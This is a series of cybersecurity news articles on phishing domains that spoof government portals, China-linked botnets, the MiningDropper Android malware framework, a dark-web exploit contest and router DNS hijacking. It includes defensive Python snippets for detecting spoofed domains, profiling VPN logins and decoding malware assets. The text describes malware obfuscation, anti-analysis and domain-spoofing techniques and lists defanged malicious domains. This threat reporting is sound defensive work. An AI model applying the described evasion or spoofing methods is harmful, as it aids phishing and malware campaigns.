Firewall Daily – The Cyber Express | Ashish Khaitan

Operation TrustTrap Reveals 16,800 Fake Domains Exploiting User Trust


In a world where digital threats are becoming increasingly deceptive, Cyble Research and Intelligence Labs (CRIL) has uncovered one of the most extensive deceptive domain spoofing campaigns to date.

Dubbed Operation TrustTrap, this large-scale operation has leveraged over 16,800 malicious domains to exploit cognitive trust mechanisms and harvest sensitive user data from unsuspecting victims.

The scope and scale of this operation reveal a shift in how cybercriminals are evolving their tactics to bypass traditional technical security measures.

What is Operation TrustTrap?

Since early 2026, CRIL has been tracking a well-coordinated infrastructure involving a massive network of spoofed domains. These domains were designed to mimic legitimate government portals, particularly those related to transportation services like Department of Motor Vehicles (DMV) portals, toll payment systems, and vehicle registration services in the United States. The aim of this campaign is clear: credential and payment card harvesting through the exploitation of trusted government-facing services.

However, the technical complexity of the attack isn't based on advanced hacking techniques. Instead, Operation TrustTrap exploits how humans visually interpret URLs. By embedding government-like subdomains, attackers have created fraudulent domains that resemble legitimate government addresses, deceiving individuals into visiting these sites and providing sensitive information.

Tencent Cloud and Alibaba Cloud APAC

The spoofed domains were predominantly hosted on Tencent Cloud and Alibaba Cloud APAC, both of which have significant data centers in the Asia-Pacific region. These platforms have been linked to the infrastructure of the campaign, and their concentrated use adds another layer of complexity to the attribution process.

Furthermore, CRIL found that the domains were primarily registered through Gname.com Pte. Ltd., a registrar known for its significant Chinese customer base. Other registrars, such as Dominet (HK) Limited and NameSilo LLC, were also identified in the campaign.

These domain names were often associated with .bond, .cc, and .cfd top-level domains (TLDs), which were frequently used to evade detection and blacklisting.

The Key Technique: Subdomain Trust Injection

The most common method used in Operation TrustTrap is subdomain trust injection. This technique involves embedding trusted government tokens, such as mass.gov or wa.gov, in subdomains rather than the root domain. In legitimate URLs, the .gov component typically appears at the end of the domain string, but in these malicious domains, .gov is cleverly placed as part of a subdomain.

For instance, a URL such as mass.gov-bzyc[.]cc will lead a user to believe they are accessing an official Massachusetts government page, but in reality, they are on a fraudulent site designed to capture personal and financial data.

[Figure: Fake Massachusetts RMV citation landing page (Source: Cyble)]

This manipulation of the domain’s structure is visually convincing, but it bypasses traditional security filters that only check the root domain for trusted indicators like .gov.

Another obfuscation technique used is hyphen-based semantic manipulation, where hyphens are inserted into familiar government identifiers to create visually similar URLs. This tactic further complicates the detection of malicious domains.

Global Targeting and Regional Focus

While Operation TrustTrap is heavily focused on the United States, targeting state portals such as those in California, Washington, and Florida, the operation is not confined to one region. CRIL identified similar spoofing efforts targeting government portals in India, Vietnam, and the United Kingdom.

In India, attackers have specifically targeted portals that follow the .gov.in domain structure. By injecting subdomains like www.in.gov-bond, the attackers were able to replicate the appearance of legitimate government websites, particularly those related to the Indian Department of National Investigation (NIA) and other defense-adjacent sites.

[Figure: APT36 impersonating NIA, India, operating at nia[.]gov[.]in[.]in3ymonaq[.]casa (Source: Cyble)]

This specific targeting suggests that the threat actor has knowledge of government infrastructure and how it operates.
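The subdomain trust injection and hyphen-based manipulation described earlier, together with the .gov.in pattern used against Indian portals, can be triaged with a hostname check that compares where a government token sits against the real public suffix. The following is an added example written for this page, not Cyble's tooling; its public-suffix table and trusted-domain list are constructed stand-ins for the Public Suffix List and a vetted government-domain list.

```python
import re

# Constructed, minimal public-suffix table; longest match wins. A real
# deployment would load the Public Suffix List instead of this stand-in.
PUBLIC_SUFFIXES = {"gov", "gov.in", "cc", "cfd", "bond", "casa", "com"}

# Constructed list of legitimate government domains to protect (assumption).
TRUSTED_GOV_DOMAINS = {"mass.gov", "wa.gov", "nia.gov.in"}

GOV_MARKER = "gov"


def normalize(host: str) -> str:
    """Lower-case, undo the defanged "[.]" notation and drop a trailing dot."""
    return host.strip().lower().replace("[.]", ".").rstrip(".")


def split_host(host: str):
    """Return (subdomain labels, registrable label, public suffix)."""
    labels = normalize(host).split(".")
    for n in (2, 1):  # try the two-label suffix (gov.in) before one-label ones
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return labels[:-n - 1], labels[-n - 1], ".".join(labels[-n:])
    if len(labels) < 2:
        return [], labels[0], ""
    # Unknown suffix: fall back to "last label is the suffix".
    return labels[:-2], labels[-2], labels[-1]


def analyze(host: str) -> list:
    """Return a list of findings; an empty list means no spoofing pattern seen."""
    findings = []
    labels = normalize(host).split(".")
    subs, _registrable, suffix = split_host(host)

    # (1) Hyphen-based semantic manipulation: "gov-bzyc" reads as ".gov" at a glance.
    for label in labels:
        if "-" in label and GOV_MARKER in label.split("-"):
            findings.append(f"hyphenated label '{label}' embeds '{GOV_MARKER}'")

    # (2) Subdomain trust injection: a literal "gov" label left of the real suffix.
    if GOV_MARKER in subs:
        findings.append(f"'{GOV_MARKER}' is a subdomain label; real suffix is '{suffix}'")

    # (3) A trusted domain appearing anywhere except as the host's actual tail.
    # Hyphens are treated as dots so "mass.gov-bzyc" is seen as "mass.gov.bzyc".
    flat = ".".join(re.split(r"[.-]", normalize(host)))
    for trusted in sorted(TRUSTED_GOV_DOMAINS):
        if flat == trusted or flat.endswith("." + trusted):
            continue  # genuinely under the trusted domain
        if f".{trusted}." in f".{flat}.":
            findings.append(f"impersonates {trusted}")
    return findings


def triage(hosts):
    """Map each hostname to its findings, for use over a domain feed."""
    return {h: analyze(h) for h in hosts}


if __name__ == "__main__":
    # Constructed sample feed mixing the article's spoofed patterns with
    # legitimate hosts.
    sample = [
        "mass.gov-bzyc[.]cc",
        "nia[.]gov[.]in[.]in3ymonaq[.]casa",
        "www.in.gov-bond",
        "mass.gov",
        "www.nia.gov.in",
    ]
    for host, found in triage(sample).items():
        print(host, "->", found or "clean")
```

The check is a triage heuristic: a legitimate hostname that happens to carry a hyphenated "gov" label would also be flagged, so findings should feed review rather than automatic blocking.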

APT36 and the Connection to Operation TrustTrap

In addition to the use of Tencent Cloud and Alibaba Cloud, the tactics, techniques, and procedures (TTPs) observed in the campaign bear a striking resemblance to those used by APT36 (also known as Transparent Tribe). This Pakistan-based Advanced Persistent Threat (APT) group has a long history of targeting Indian government entities, defense personnel, and diplomatic infrastructure.

The infrastructure used in Operation TrustTrap shows similarities to APT36’s previous campaigns, particularly in terms of the domain registration patterns and use of Tencent Cloud and Alibaba Cloud APAC infrastructure. Furthermore, the behavior observed, including domain rotation and the use of disposable domains, matches previous APT36 activities.

Registrar and Hosting Analysis

The dominance of Gname.com as the registrar of choice for over 70% of the spoofed domains points to a specific trend in the campaign’s operational setup. This Singapore-based registrar, which serves a large number of Chinese entities, is part of the broader infrastructure strategy that focuses on low-cost hosting in the Asia-Pacific region.

Notably, Tencent Cloud and Alibaba Cloud APAC offer cloud services with global reach, providing the necessary infrastructure to scale this type of malicious operation. These services have been instrumental in supporting the rapid deployment of phishing sites across a variety of government services, especially those involving time-sensitive financial transactions.

The Cyber Express Weekly Roundup: Data Breaches, Malware Campaigns, and Cyber Fraud Investigations


In this week’s edition of The Cyber Express weekly roundup, we explore the latest developments in the world of cybersecurity, focusing on high-profile data breaches, growing malware campaigns, and law enforcement actions against cybercriminals.

As the digital threat landscape continues to evolve, attackers are targeting sensitive personal and organizational data, from health records to financial credentials. Meanwhile, government regulators are ramping up efforts to protect minors and combat harmful content on social platforms, while cybercriminals continue to exploit vulnerabilities in both public and private sectors.

This weekly roundup highlights how various industries, from healthcare and social media to finance and government, are grappling with rising threats, making it clear that the intersection of data security, regulation, and cybercrime is more critical than ever.

The Cyber Express Weekly Roundup 

UK Biobank Data Breach Triggers Urgent Review of Data Security Measures 

A significant data breach at the UK Biobank has raised major concerns over the security of health-related data used in scientific research. In April 2026, de-identified participant information was discovered being sold on a Chinese consumer platform, sparking widespread alarm among the research community.

Vercel CEO Reveals Expansion of Malware Campaign Affecting Multiple Targets 

Vercel's CEO, Guillermo Rauch, confirmed that the recent breach involving Context.ai was part of a much larger malware campaign affecting multiple targets. Following a review of network logs, Vercel’s security team uncovered evidence of malware distribution that compromised several customer accounts, including access to valuable Vercel account keys.

Ofcom Investigates Telegram and Teen Platforms 

In the UK, Ofcom has launched an investigation into Telegram and several popular teen chat platforms, such as Teen Chat and Chat Avenue, after reports surfaced of online grooming and child sexual abuse material (CSAM) on these services. Under the Online Safety Act, platforms are required to take proactive steps to prevent harmful content and protect minors from exploitation.

Personal Data Exposed in Breach of France’s ANTS Portal 

A recent breach of France’s ANTS (Agence Nationale des Titres Sécurisés) portal has compromised personal data, including names, email addresses, and birthdates, although no documents or sensitive attachments were affected. The breach, which occurred on April 15, 2026, raises significant concerns about identity theft and phishing risks, as the exposed data could be used to target individuals.

Bluesky Faces Coordinated DDoS Attack 

Bluesky, the rapidly expanding social media platform, suffered a major disruption on April 15, 2026, when it was targeted by a sophisticated distributed denial-of-service (DDoS) attack. The attack caused widespread outages, impacting core platform functions such as user feeds, notifications, and search capabilities.

Indian Authorities Arrest Key SIM Card Supplier in Cyber Fraud Crackdown 

India’s Central Bureau of Investigation (CBI) has arrested a key conspirator in a major cyber fraud operation as part of Operation Chakra-V. The suspect, arrested in Guwahati, is accused of supplying fraudulent SIM cards used in various cybercrime schemes, including extortion and fake loan scams. The SIM cards were acquired using fake identities and distributed to cybercriminal networks.

Weekly Takeaway 

This week’s roundup highlights the diverse and evolving nature of cyber threats. From the exposure of sensitive health data and sophisticated malware campaigns to DDoS attacks and SIM card fraud schemes, the cybersecurity landscape remains fraught with challenges. Regulatory bodies and companies alike continue to grapple with emerging risks, particularly in sectors like public health data, social media platforms, and digital content safety. As these incidents unfold, it’s clear that both technical vulnerabilities and human factors, such as social engineering, continue to be central targets for attackers.

With regulatory frameworks like the Online Safety Act and increased investigative efforts in places like India and France, the pressure on platforms and authorities to act quickly and decisively is higher than ever. As the cyber threat landscape becomes more interconnected, the need for enhanced security protocols, improved monitoring, and greater accountability in digital spaces remains critical.
Firewall Daily – The Cyber Express | Ashish Khaitan

China-Linked Cyber Actors Turn to Massive Covert Botnets to Evade Detection


A newly issued cybersecurity advisory highlights an evolution in the tactics, techniques and procedures (TTPs) employed by China-Nexus threat actors. The report, released with support from the UK Cyber League and coordinated by the National Cyber Security Centre (NCSC-UK) alongside international partners, sheds light on how Chinese threat actors are relying on large-scale covert networks of compromised devices to conduct malicious cyber operations.

A Strategic Shift in China-Nexus TTPs 

In recent years, cybersecurity experts have observed a clear transition in China-Nexus TTPs. Rather than relying on dedicated, individually controlled infrastructure, Chinese threat actors are now leveraging expansive networks of compromised devices, commonly referred to as covert networks or botnets. These networks are primarily composed of Small Office/Home Office (SOHO) routers, Internet of Things (IoT) devices, and other internet-connected hardware.

According to the advisory, the majority of China-Nexus actors are believed to be using such covert networks, with multiple networks operating simultaneously and often shared among different groups. These networks are continuously updated, making them highly adaptable and difficult to track. Any organization targeted by Chinese threat actors could be affected. For example, the group known as Volt Typhoon has used these covert networks to pre-position cyber capabilities within critical infrastructure, while Flax Typhoon leveraged similar methods for espionage operations.

How Covert Networks Operate 

Although botnets are not new, China-Nexus actors are now deploying them at an unprecedented scale and with strategic intent. These covert networks allow attackers to mask their identity, route malicious traffic through multiple nodes, and reduce the risk of attribution. Typically, an attacker accesses the network via an entry point, or “on-ramp,” and routes activity through numerous compromised devices—called traversal nodes—before exiting near the target. This multi-hop approach obscures the origin of the attack.

These networks support every stage of a cyber operation, from reconnaissance and scanning to malware delivery, command-and-control communication, and data exfiltration. They are also used for general browsing, enabling threat actors to research vulnerabilities and refine TTPs without revealing their identity. The presence of legitimate users on some networks further complicates attribution.

Real-World Examples and Scale 

Evidence suggests that some covert networks used by China-Nexus actors are developed and maintained by Chinese cybersecurity firms. One notable example is the “Raptor Train” network, which infected over 200,000 devices globally in 2024. It was reportedly managed by Integrity Technology Group, a company also linked by the FBI to activities associated with Flax Typhoon. Another example is the KV Botnet used by Volt Typhoon, which primarily exploited outdated Cisco and NetGear routers. These devices were particularly vulnerable because they had reached “end-of-life” status, meaning they no longer received security updates.

The scale and adaptability of these networks present a major challenge. As Paul Chichester, NCSC Director of Operations, stated: “Botnet operations represent a significant threat to the UK by exploiting vulnerabilities in everyday internet-connected devices with the potential to carry out large-scale cyberattacks.”

Challenges for Network Defenders 

Cybersecurity researchers have long been aware of such threats, but the evolving nature of China-Nexus TTPs introduces new difficulties. A key issue identified by Mandiant Intelligence in May 2024 is “indicator of compromise (IOC) extinction.” Traditional defenses, such as static IP blocklists, are becoming less effective because attackers can operate from vast, constantly changing pools of devices. As compromised nodes are patched or removed, new ones are quickly added, making these networks highly dynamic. This fluidity undermines conventional detection and mitigation strategies.

Defensive Measures and Best Practices 

The advisory outlines several steps organizations can take to defend against China-Nexus covert networks: 

For all organizations: 

  • Maintain a clear inventory of network edge devices. 
  • Establish baselines for normal network activity, particularly VPN access. 
  • Monitor for unusual connections, including those from consumer broadband ranges. 

For higher-risk organizations: 

  • Use IP allow lists instead of blocklists for VPN access. 
  • Apply geographic and behavioral profiling of incoming connections. 
  • Adopt zero-trust security models. 
  • Enforce SSL machine certificates. 
  • Reduce exposure of internet-facing systems. 
  • Explore machine learning tools to detect anomalies. 

For the most at-risk entities: 

  • Treat China-Nexus covert networks as advanced persistent threats (APTs). 
  • Map and monitor known covert networks using threat intelligence. 
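The “IOC extinction” problem and the VPN guidance above (baseline normal access, watch consumer broadband ranges, prefer allow lists to blocklists) can be compared by running the three policies over the same login records. This is an added example written for this page, not from the advisory; the address ranges and login records are constructed, with 198.51.100.0/24 standing in for a residential ISP range where SOHO routers sit.

```python
import ipaddress
from collections import defaultdict

# Constructed VPN authentication records: (day, user, source IP).
VPN_LOGINS = [
    (0, "alice", "203.0.113.10"),
    (0, "bob", "203.0.113.25"),
    (1, "alice", "203.0.113.10"),
    (1, "bob", "198.51.100.7"),    # login relayed through a compromised SOHO node
    (2, "alice", "203.0.113.11"),
    (2, "bob", "198.51.100.88"),   # next day: a different node from the same pool
]

# Constructed ranges. Allow list: corporate egress; broadband: a stand-in for
# residential ISP space where covert-network nodes live.
CORPORATE_ALLOW = [ipaddress.ip_network("203.0.113.0/24")]
CONSUMER_BROADBAND = [ipaddress.ip_network("198.51.100.0/24")]

# Static blocklist built from the day-1 IOC only, as a feed would provide it.
IOC_BLOCKLIST = {"198.51.100.7"}


def in_any(ip, networks):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def blocklist_policy(logins, blocklist=IOC_BLOCKLIST):
    """Flag logins whose source IP is on the static blocklist (IOC approach)."""
    return [(d, u, ip) for d, u, ip in logins if ip in blocklist]


def allowlist_policy(logins, allow=CORPORATE_ALLOW):
    """Flag logins whose source IP is outside the approved ranges."""
    return [(d, u, ip) for d, u, ip in logins if not in_any(ip, allow)]


def baseline_policy(logins, baseline_days=(0,)):
    """Learn each user's source /24s on baseline days; flag later deviations.

    Deviations from consumer broadband space are tagged separately, since the
    advisory singles those out as worth monitoring.
    """
    seen = defaultdict(set)
    for d, u, ip in logins:
        if d in baseline_days:
            seen[u].add(ipaddress.ip_network(f"{ip}/24", strict=False))
    flagged = []
    for d, u, ip in logins:
        if d in baseline_days:
            continue
        net = ipaddress.ip_network(f"{ip}/24", strict=False)
        if net not in seen[u]:
            tag = "consumer-broadband" if in_any(ip, CONSUMER_BROADBAND) else "unbaselined"
            flagged.append((d, u, ip, tag))
    return flagged


if __name__ == "__main__":
    print("blocklist :", blocklist_policy(VPN_LOGINS))   # misses the day-2 node
    print("allow list:", allowlist_policy(VPN_LOGINS))   # catches both days
    print("baseline  :", baseline_policy(VPN_LOGINS))
```

The day-2 login from 198.51.100.88 is exactly the case the advisory describes: a node that replaced the one in the blocklist, invisible to the IOC policy but caught by the allow list and by the per-user baseline.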

The Cyber Express Weekly Roundup: Crypto Breaches, State-Linked Schemes, and Platform Exploits


In this week’s roundup, The Cyber Express reviews major developments across the cybersecurity domain, highlighting incidents involving crypto ecosystem attacks, state-linked fraud operations, regulatory scrutiny, and underground cybercrime activity. The broader threat landscape continues to show attackers targeting infrastructure weaknesses, social engineering pathways, and third-party dependencies rather than isolated technical flaws.

Across multiple cases, state-aligned and financially motivated actors are focusing on routers, DNS layers, and decentralized systems to intercept data and manipulate transactions. At the same time, gaps in regulation and enforcement continue to complicate platform accountability, particularly in online safety and digital content governance.

The Cyber Express Weekly Roundup 

$15M Grinex Hack Halts Trading After Wallet Breach 

Grinex suspended trading and withdrawals following a coordinated attack that compromised its wallet infrastructure, resulting in the theft of more than $15 million in USDT. The attackers rapidly moved assets across Ethereum and Tron networks, using chain-hopping and layering techniques to obscure transaction trails and avoid detection.

Two U.S. Nationals Sentenced in $5M North Korea IT Worker Scheme 

Two U.S. nationals, Kejia Wang and Zhenxing Wang, received prison sentences of 108 and 92 months for their roles in a North Korea-linked remote employment scheme that generated over $5 million. The operation used stolen identities, domestic “laptop farms,” and shell companies to present overseas workers as U.S.-based employees across more than 100 companies.

Australia Social Media Ban Faces Enforcement Questions 

Australia’s under-16 social media restriction is facing renewed scrutiny after a study of 1,050 children found that over 60% of previously active users aged 12–15 continue accessing platforms such as TikTok, YouTube, and Instagram. Many accounts remained active without intervention from providers, and in some cases, users created new profiles after restrictions were applied.

TierOne Dark Web Contest Offers $10K for Exploit Writeups 

A dark web forum known as TierOne has launched a $10,000 contest encouraging detailed technical write-ups on vulnerability exploitation techniques. Running from April 13 to May 14, 2026, and reportedly sponsored by a ransomware group, the contest focuses on topics such as remote code execution, IDOR, SSTI, firmware attacks, and EDR bypass methods.

Rockstar Cyberattack Confirmed Amid Extortion Threat 

Rockstar Games confirmed a cyberattack involving unauthorized access through a third-party service, though it stated that core operations and player systems were unaffected. The threat actor group ShinyHunters claimed responsibility, alleging access to internal company data and demanding payment by April 14, 2026, under threat of public release.

Weekly Takeaway 

The Cyber Express weekly roundup reflects a threat landscape that is fragmented yet interconnected. From multimillion-dollar crypto thefts and criminal employment schemes to underground exploit markets and extortion-driven breaches, attackers are consistently blending technical exploitation with deception and supply chain targeting.

Regulatory uncertainty and weak enforcement mechanisms further amplify these risks, allowing both state-linked and financially motivated actors to operate with greater flexibility across digital environments.
Firewall Daily – The Cyber Express | Ashish Khaitan

MiningDropper Turns Android Apps Into Multi-Stage Malware Delivery Systems


Researchers have uncovered an Android malware framework dubbed MiningDropper. Security researchers at Cyble Research and Intelligence Labs (CRIL) have identified a sharp increase in campaigns using MiningDropper, a modular platform capable of distributing multiple types of malicious payloads, including cryptocurrency miners, infostealers, Remote Access Trojans (RATs), and banking malware.

A notable aspect of this campaign is its abuse of the open-source Lumolight application, which has been repurposed as a trojanized entry point.

A Modular Android Malware Framework at Scale

MiningDropper is not a conventional malware strain. Instead, it operates as a multi-stage delivery framework designed to evade detection and dynamically deploy payloads. Its architecture integrates XOR-based obfuscation, AES-encrypted payload staging, dynamic DEX loading, and anti-emulation techniques. These layers collectively delay analysis and reduce the likelihood of detection by traditional antivirus solutions.

Over 1,500 MiningDropper samples have been observed in the wild within a single month, with more than 50% showing minimal antivirus detection. Notably, around 668 samples registered only three antivirus detections, indicating widespread distribution with low visibility.

Lumolight as the Initial Infection Vector 

A recent variant of MiningDropper uses a trojanized version of Lumolight as its initial payload. Victims unknowingly install this compromised application through phishing links, fraudulent websites, or social media campaigns. Once installed, the malicious application triggers a native library, “librequisitionerastomous.so”, which begins the execution chain. This native layer decrypts XOR-obfuscated strings at runtime and checks whether the app is running in an emulator or rooted environment. If such conditions are detected, the malware halts execution to avoid analysis. Otherwise, it proceeds to decrypt and load the first-stage payload from the app’s assets. 

Multi-Stage Payload Delivery Mechanism 

[Figure: MiningDropper attack chain (Source: Cyble)]

MiningDropper’s infection chain unfolds across multiple stages:
  • Initial Stage: The native code decrypts an embedded asset using a hardcoded XOR key, producing a DEX file. This file is dynamically loaded using DexClassLoader and executes a bootstrap component.
  • First Stage: The bootstrap loader decrypts a second-stage payload using AES encryption. The AES key is derived from the SHA-1 hash of the file name, making it harder for analysts to extract static keys.
  • Second Stage: This stage presents a fake Google Play update interface, a social engineering tactic designed to maintain user trust. Behind the scenes, it decrypts additional payloads and configuration files. The malware can operate in two modes: a cryptocurrency miner or a user-defined malicious payload. Configuration files such as “norweyanlinkediting” (miner path) and “udela” (user payload path) dictate the behavior. These configurations include parameters like remote control capabilities, payload splits, and subscription timelines.
  • Third Stage: The malware extracts a ZIP archive containing further DEX files and native libraries. Acting as a split-APK installer, it reconstructs and installs the final payload based on the configuration.
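For the initial stage described above, an analyst with the APK in hand does not need to pull the hardcoded key out of the native library: a DEX file has fixed header bytes, so a repeating-key XOR can be recovered from known plaintext and the asset decoded for triage. This is an added example for this page, not CRIL's tooling; it assumes the XOR is a simple repeating key of at most eight bytes, and the encrypted asset is constructed inline from a minimal fake DEX header.

```python
import struct

# Known-plaintext bytes present in every DEX header (offset -> bytes): the
# "dex\n" prefix of the magic (the version digits vary, so they are not used),
# the NUL that ends the magic, header_size (always 0x70) and the endian tag.
DEX_KNOWN = {
    0: b"dex\n",
    7: b"\x00",
    36: struct.pack("<I", 0x70),
    40: struct.pack("<I", 0x12345678),
}
MAX_KEY_LEN = 8  # assumption for this example; longer keys need more known bytes


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_xor_key(blob: bytes, max_len: int = MAX_KEY_LEN):
    """Return the shortest repeating key consistent with DEX_KNOWN, or None."""
    for klen in range(1, max_len + 1):
        key = [None] * klen
        ok = True
        for offset, plain in DEX_KNOWN.items():
            for j, p in enumerate(plain):
                pos = offset + j
                if pos >= len(blob):
                    ok = False
                    break
                kb = blob[pos] ^ p
                slot = pos % klen
                if key[slot] is None:
                    key[slot] = kb
                elif key[slot] != kb:
                    ok = False  # conflicting evidence: wrong key length
                    break
            if not ok:
                break
        if ok and None not in key:
            return bytes(key)
    return None


def decode_stage0_asset(blob: bytes):
    """Recover the key and return (key, decoded bytes) if the result is a DEX."""
    key = recover_xor_key(blob)
    if key is None:
        return None
    plain = xor_bytes(blob, key)
    if not plain.startswith(b"dex\n"):
        return None
    return key, plain


def build_fake_dex_header() -> bytes:
    """Constructed 112-byte DEX header with the fixed fields set, rest zero."""
    hdr = bytearray(0x70)
    hdr[0:8] = b"dex\n035\x00"
    hdr[32:36] = struct.pack("<I", 0x70)        # file_size (header only)
    hdr[36:40] = struct.pack("<I", 0x70)        # header_size
    hdr[40:44] = struct.pack("<I", 0x12345678)  # endian_tag
    return bytes(hdr)


# Constructed sample: the fake header encrypted with a 5-byte key.
SAMPLE_KEY = bytes.fromhex("5a13c40799")
SAMPLE_ASSET = xor_bytes(build_fake_dex_header(), SAMPLE_KEY)

if __name__ == "__main__":
    result = decode_stage0_asset(SAMPLE_ASSET)
    if result:
        key, plain = result
        print("recovered key:", key.hex(), "magic:", plain[:8])
```

Shorter candidate lengths are rejected because the known bytes disagree with each other, which is what makes the recovery reliable rather than a guess; a decoded blob that starts with "dex\n" can then be handed to normal DEX tooling.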

Campaigns Targeting Multiple Regions 

CRIL identified two primary campaign clusters leveraging MiningDropper:
  • Infostealer Campaign (India): This campaign targets Indian users by impersonating trusted entities such as Regional Transport Office (RTO) services, banks, telecom providers, and popular apps. In October 2025, a campaign using RTO-themed lures distributed malicious APK files that ultimately deployed infostealers to harvest sensitive financial and personal data.
  • BTMOB RAT Campaign (Global): Another campaign distributes MiningDropper across Europe, Latin America, and Asia. In this case, the final payload is BTMOB RAT, a powerful Android trojan first identified in February 2024 as a variant of SpySolr malware. It supports credential theft, real-time remote control, device takeover, and financial fraud operations.

Interestingly, while BTMOB RAT was initially distributed without obfuscation and detected by multiple antivirus engines, its integration with MiningDropper has reduced detection rates to as low as one to three engines.

Final Payload Capabilities 

The final payload delivered by MiningDropper depends on the configuration: 
  • Infostealers: Extract sensitive data such as login credentials and financial information.
  • RATs (e.g., BTMOB RAT): Enable full device compromise, including screen monitoring, file access, audio recording, and command execution via WebSocket-based communication.
  • Banking Trojans: Facilitate financial fraud through credential harvesting and transaction manipulation. 
  • Cryptocurrency Miners: Utilize device resources for unauthorized mining operations.
The malware also abuses Android Accessibility Services to gain extensive control over infected devices, allowing it to simulate user interactions and grant additional permissions. 

A Scalable Malware-as-a-Framework Model 

MiningDropper demonstrates a shift toward malware frameworks that prioritize scalability and adaptability. Its ability to switch between payloads using configuration changes, without altering the core architecture, makes it highly reusable across campaigns. This modularity enables threat actors to rapidly expand operations while maintaining low detection rates.

MiningDropper is more than just another Android malware strain. By combining advanced obfuscation, multi-stage execution, and the exploitation of legitimate projects like Lumolight, it represents a threat model capable of sustaining large-scale, global campaigns.
Firewall Daily – The Cyber Express | Ashish Khaitan

Dark Web Article Contest Offers $10,000 for Exploit Writing on TierOne Forum


In an unusual development within the underground cyber world, a dark web article contest has been announced on a well-known dark web forum, TierOne forum. The initiative is backed by a $10,000 prize pool. The contest places a spotlight on technical writing centered around vulnerability exploitation, offering insight into how knowledge is shared and rewarded in these spaces.

Traditionally, dark web forums have been linked to illicit activities such as trading stolen data, coordinating ransomware attacks, and distributing malware. However, this contest introduces a different dynamic, one that mirrors legitimate cybersecurity ecosystems, where researchers document findings and share exploit techniques.

The Dark Web Article Contest Overview and Prize Structure 

According to an official announcement shared by an administrator on the forum, the post states: “Hi everyone! We are pleased to announce T1 erone [ARTICLE CONTEST #1 - 2026]. Contest winners receive prizes: 1st place $5,000, 2nd place - $3,000, 3rd place - $2,000, [Prize pool $10,000]. Article submissions open on 13.04.2026 and close on 14.05.2026.”

The announcement indicates that the dark web article contest will run from April 13, 2026, to May 14, 2026, with prize amounts set at $5,000 for first place, $3,000 for second place, and $2,000 for third place, making up a total prize pool of $10,000, reportedly sponsored by the ransomware group cry0.

Topics Focused on Vulnerability Exploitation 

The contest invites submissions covering a wide range of advanced topics related to vulnerability exploitation with real-world applicability. These include: 
  • Remote Code Execution (RCE) through deserialization flaws in React and Node.js frameworks. 
  • Command injection attacks in APIs and backend systems. 
  • Insecure Direct Object Reference (IDOR) vulnerabilities in SaaS platforms. 
  • Server-Side Template Injection (SSTI) in modern templating engines. 
  • Exploitation of insecure deserialization in PHP and Java. 
  • Client-side RCE via Markdown or Office file rendering. 
  • Firmware attacks targeting routers and cameras. 
  • Privilege escalation techniques in RouterOS and similar systems. 
  • Exploitation methods for products from Cisco, MikroTik, Oracle, and Ubiquiti. 
  • Zero-day discovery in browser components like WebGPU and Blink. 
  • AI-assisted vulnerability discovery and reverse engineering. 
  • Techniques for bypassing AV and EDR security systems. 
  • Exploitation of Remote Procedure Call (RPC) mechanisms. 
For context, vulnerabilities such as RCE, IDOR, and SSTI allow attackers to execute arbitrary code or access restricted data, while firmware attacks enable persistent control over hardware devices. Similarly, AV/EDR bypass techniques are designed to evade detection by modern security solutions. 

Participation Rules and Requirements 

The TierOne forum has outlined strict guidelines for participants. Articles must be published within the forum’s designated section and include a specific prefix to qualify: 
  • Submissions must be posted under the Articles section with the prefix “[Contest]”. 
  • A link to the article must be shared in the contest thread with a participation note. 
  • All users are eligible, regardless of registration date or activity level. 
  • The use of multiple accounts is strictly prohibited. 
In addition, the contest enforces content quality standards: 
  • Articles must be original and based on the author’s own experience. 
  • Copy-pasted or reposted material is not allowed. 
  • Submissions should comprehensively cover the chosen topic, including tools, techniques, and methodologies. 
  • Minimum length requirement is at least one A4 page. 
  • Excessive filler content is discouraged. 
  • Including video demonstrations may improve chances of winning. 

A Glimpse into Dark Web Knowledge Sharing 

While the existence of such a contest may seem surprising, it reflects a broader trend within dark web forums. Beyond illegal marketplaces and data trading, these platforms also function as hubs for technical exchange, where members document and refine vulnerability exploitation techniques.

In many ways, the structure resembles legitimate bug bounty programs and penetration testing workflows, where cybersecurity professionals publish detailed reports on discovered flaws. The key difference lies in the intent and the environment in which this knowledge is applied.

It is important to note that this article does not endorse participation in such activities. Instead, it aims to shed light on how these underground ecosystems operate. The TierOne forum contest highlights that even within the dark web, there are organized efforts to produce structured, experience-based technical content, albeit in a context that raises ethical and legal concerns.

Russian Hackers Exploit SOHO Routers for DNS Hijacking Campaign

Ashish Khaitan, Firewall Daily – The Cyber Express

The rise of SOHO router compromise campaigns has exposed a critical weakness in global network security, particularly as threat actors like Forest Blizzard continue to exploit poorly secured home and small-office devices.

According to security researchers, this Russia-linked group has been systematically targeting vulnerable routers since at least August 2025, transforming them into covert infrastructure for surveillance and follow-on cyberattacks.

Forest Blizzard and the Expanding SOHO Router Compromise Campaign 

Forest Blizzard, a threat actor associated with Russian military intelligence and tracked in part as Storm-2754, has conducted widespread exploitation of SOHO devices. By leveraging the SOHO router compromise, the group has successfully hijacked Domain Name System (DNS) requests, allowing it to passively monitor and collect network traffic at scale.

Microsoft identified more than 200 organizations and over 5,000 consumer devices impacted by this malicious DNS infrastructure. Notably, telemetry showed no compromise of Microsoft-owned systems. However, the breadth of affected networks highlights the campaign’s reach and the effectiveness of targeting edge devices that often lack strong monitoring or security controls.

For actors like Forest Blizzard, DNS hijacking provides persistent and low-visibility access to sensitive data flows. By positioning themselves upstream of enterprise environments, attackers can observe and potentially manipulate traffic without directly breaching corporate systems.

How SOHO Router Compromise Leads to DNS Hijacking 

After gaining access to vulnerable routers, Forest Blizzard alters their default configurations to use attacker-controlled DNS resolvers. This manipulation causes connected devices to unknowingly send DNS queries to malicious servers.

Most endpoint devices rely on routers for network configuration via the Dynamic Host Configuration Protocol (DHCP). Once a router is compromised, all connected devices inherit the malicious DNS settings. This makes SOHO router compromise an efficient and scalable attack vector.

The group is believed to use the legitimate dnsmasq utility to handle DNS queries. While dnsmasq is commonly used in home networking for DNS forwarding and DHCP services, in this context it enables attackers to intercept, log, and respond to DNS requests while maintaining the appearance of normal operations.

Forest Blizzard’s Use of Adversary-in-the-Middle Attacks 

